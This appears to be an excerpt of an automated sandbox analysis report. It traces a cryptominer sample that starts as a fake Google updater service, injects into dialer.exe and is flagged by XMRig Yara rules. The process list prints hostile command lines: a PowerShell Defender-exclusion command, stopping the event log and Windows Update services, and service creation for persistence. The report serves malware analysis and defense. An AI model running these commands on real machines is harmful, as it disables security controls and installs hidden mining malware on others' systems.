                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:24
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:25
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\dialer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\dialer.exe
                                                                    Imagebase:0x7ff7f57b0000
                                                                    File size:39'936 bytes
                                                                    MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:26
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:27
                                                                    Start time:06:24:28
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:28
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:29
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:30
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                    Imagebase:0x7ff70f010000
                                                                    File size:862'208 bytes
                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:31
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\winlogon.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:winlogon.exe
                                                                    Imagebase:0x7ff7f7550000
                                                                    File size:906'240 bytes
                                                                    MD5 hash:F8B41A1B3E569E7E6F990567F21DCE97
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:32
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe stop eventlog
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:33
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\sc.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                                                    Imagebase:0x7ff7c61a0000
                                                                    File size:72'192 bytes
                                                                    MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:true

                                                                    Target ID:34
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\lsass.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\lsass.exe
                                                                    Imagebase:0x7ff7bf4f0000
                                                                    File size:59'456 bytes
                                                                    MD5 hash:A1CC00332BBF370654EE3DC8CDC8C95A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:35
                                                                    Start time:06:24:29
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\conhost.exe
                                                                    Wow64 process (32bit):false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 36
Start time: 06:24:29
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 37
Start time: 06:24:29
Start date: 05/11/2024
Path: C:\ProgramData\Google\Chrome\updater.exe
Wow64 process (32bit): false
Commandline: C:\ProgramData\Google\Chrome\updater.exe
Imagebase: 0x7ff7cbc80000
File size: 5'511'680 bytes
MD5 hash: 73A56908097EE57DD4217877AEAE4641
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 55%, ReversingLabs
Has exited: true

Target ID: 38
Start time: 06:24:29
Start date: 05/11/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Imagebase: 0x7ff760310000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 39
Start time: 06:24:29
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 40
Start time: 06:24:30
Start date: 05/11/2024
Path: C:\Windows\System32\svchost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
Imagebase: 0x7ff77afe0000
File size: 55'320 bytes
MD5 hash: B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: false

Target ID: 41
Start time: 06:24:31
Start date: 05/11/2024
Path: C:\Windows\System32\dwm.exe
Wow64 process (32bit): false
Commandline: "dwm.exe"
Imagebase: 0x7ff6f73e0000
File size: 94'720 bytes
MD5 hash: 5C27608411832C5B39BA04E33D53536C
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Has exited: false

Target ID: 42
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Imagebase: 0x7ff652a00000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 43
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe stop UsoSvc
Imagebase: 0x7ff7c61a0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 44
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 45
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 46
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\wusa.exe
Wow64 process (32bit): false
Commandline: wusa /uninstall /kb:890830 /quiet /norestart
Imagebase: 0x7ff7e7830000
File size: 345'088 bytes
MD5 hash: FBDA2B8987895780375FE0E6254F6198
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 47
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe stop WaaSMedicSvc
Imagebase: 0x7ff7c61a0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 48
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 49
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe stop wuauserv
Imagebase: 0x7ff7c61a0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 50
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 51
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe stop bits
Imagebase: 0x7ff7c61a0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 52
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 53
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\sc.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\sc.exe stop dosvc
Imagebase: 0x7ff7c61a0000
File size: 72'192 bytes
MD5 hash: 3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 54
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 55
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Imagebase: 0x7ff67c300000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 56
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
Imagebase: 0x7ff67c300000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 57
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 58
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
Imagebase: 0x7ff67c300000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 59
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 60
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\powercfg.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
Imagebase: 0x7ff67c300000
File size: 96'256 bytes
MD5 hash: 9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 61
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 62
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff70f010000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 63
Start time: 06:24:32
Start date: 05/11/2024
Path: C:\Windows\System32\dialer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\dialer.exe
                                                                    Imagebase:0x7ff7f57b0000
                                                                    File size:39'936 bytes
                                                                    MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:64
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\dialer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\dialer.exe
                                                                    Imagebase:0x7ff7f57b0000
                                                                    File size:39'936 bytes
                                                                    MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:65
                                                                    Start time:06:24:32
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\dialer.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:dialer.exe
                                                                    Imagebase:0x7ff7f57b0000
                                                                    File size:39'936 bytes
                                                                    MD5 hash:B2626BDCF079C6516FC016AC5646DF93
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000003.2002764308.000001E2F68E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000003.1931884309.000001E2F68E2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000002.2575912282.000001E2F6861000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000041.00000002.2571106481.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000041.00000002.2571106481.0000000140001000.00000040.00000001.00020000.00000000.sdmp, Author: unknown
                                                                    Has exited:false

                                                                    Target ID:66
                                                                    Start time:06:24:33
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
                                                                    Imagebase:0x7ff77afe0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:67
                                                                    Start time:06:24:33
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
                                                                    Imagebase:0x7ff77afe0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:68
                                                                    Start time:06:24:33
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                    Imagebase:0x7ff77afe0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                    Target ID:69
                                                                    Start time:06:24:34
                                                                    Start date:05/11/2024
                                                                    Path:C:\Windows\System32\svchost.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                                                                    Imagebase:0x7ff77afe0000
                                                                    File size:55'320 bytes
                                                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                    Has elevated privileges:false
                                                                    Has administrator privileges:false
                                                                    Programmed in:C, C++ or other language
                                                                    Has exited:false

                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1387303207.00007FF6F1D41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF6F1D40000, based on PE: true
                                                                      • Associated: 00000000.00000002.1387288654.00007FF6F1D40000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1387324950.00007FF6F1D54000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1387351991.00007FF6F1D58000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1387370927.00007FF6F1D59000.00000008.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1387948709.00007FF6F224D000.00000004.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1388076494.00007FF6F2286000.00000002.00000001.01000000.00000003.sdmp
                                                                      • Associated: 00000000.00000002.1388105957.00007FF6F2289000.00000002.00000001.01000000.00000003.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_7ff6f1d40000_file.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 468899d511a3580b8016a16ee82124799021391b29db4fe74c236ec62e562d6c
                                                                      • Instruction ID: 5b2d039728eea8e69cff1657858c9eaf84520d5001e628ba799055f481b5d0bf
                                                                      • Opcode Fuzzy Hash: 468899d511a3580b8016a16ee82124799021391b29db4fe74c236ec62e562d6c
                                                                      • Instruction Fuzzy Hash: F4B01230D0830985E3002F09E8413593270BB187C2F500230C51C433D2EF7D60404B11

                                                                      Execution Graph

                                                                      Execution Coverage:46.1%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:67%
                                                                      Total number of Nodes:227
                                                                      Total number of Limit Nodes:24

                                                                      Callgraph

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: CreateProcess$Close$CurrentHandleResource$FileSecurityThread$DescriptorFreeHeapModuleOpenProtectTokenValueVirtual$AdjustAllocConvertErrorFindInformationLastLibraryLoadLocalLockLookupMappingPrivilegePrivilegesSizeofSleepStringViewlstrcmpi
                                                                      • String ID: D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$DLL$SOFTWARE\dialerconfig$SeDebugPrivilege$kernel32.dll$ntdll.dll$pid$svc64
                                                                      • API String ID: 4177739653-1130149537
                                                                      • Opcode ID: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                      • Instruction ID: c2e61514e361dd61edc66d1a85693de1d2c237bf329a5b31df93bef4cff25afe
                                                                      • Opcode Fuzzy Hash: d90b24f95a95c841a2e029a5b4d6274d008a65fb61feaf57b7d2a555975f1ca1
                                                                      • Instruction Fuzzy Hash: B781E4B6200B4196EB26CF62F8547D977A9F78CBD8F44512AEB4A43A78DF38C148C740

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileLocalName$CodeCountErrorExitFindFreeLastMemoryModuleObjectPathQuerySingleThreadVirtualWaitWow64Writelstrlen
                                                                      • String ID: @$MSBuild.exe$ReflectiveDllMain$dialer.exe
                                                                      • API String ID: 2561231171-3753927220
                                                                      • Opcode ID: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                      • Instruction ID: 2175fd9260984ecd3e092ef955109d5d50fbfcc0bf213717558b1eb8b1c9701c
                                                                      • Opcode Fuzzy Hash: 0577da8a6dab89cee6e9ad54b472e69925a8a9fa9a84297e512ce95199d2773e
                                                                      • Instruction Fuzzy Hash: 40B138B260468186EB26DF27F8947E927A9FB8CBC4F404125AF4A477B4EF38C645C740

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                                                      • String ID:
                                                                      • API String ID: 4084875642-0
                                                                      • Opcode ID: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                      • Instruction ID: 4858e5a3d965c592fcd1f5951e26bd94c88d4916acf90710a0b336d1aa1e032e
                                                                      • Opcode Fuzzy Hash: 3ba232721d1513b5cedada72c6e24bd118260bd52d62463099d565cdd5ea385d
                                                                      • Instruction Fuzzy Hash: E6519DB2711A819AEB66CF63E8587EA22A5F78DBC4F444025EF4947764DF38C545C700

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000019.00000002.1435815851.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                      • Associated: 00000019.00000002.1435783421.0000000140000000.00000004.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435852744.0000000140003000.00000002.00000001.00020000.00000000.sdmp
                                                                      • Associated: 00000019.00000002.1435905425.0000000140006000.00000002.00000001.00020000.00000000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_25_2_140000000_dialer.jbxd
                                                                      Similarity
                                                                      • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                                                      • String ID:
                                                                      • API String ID: 3197395349-0
                                                                      • Opcode ID: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                      • Instruction ID: 21eaad2a8fcaa81d39f01622d1c01d05a8059e075f91819b3ade9b41c51f013a
                                                                      • Opcode Fuzzy Hash: 488be1c38cf594ed0d3f6a94cbc7f0150440055c9cb1e58666deddfd8d25be8b
                                                                      • Instruction Fuzzy Hash: FA318D72215691CAE761CF25F490BDE77A5F748B98F40521AFB4947FA8EB78C208CB40

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
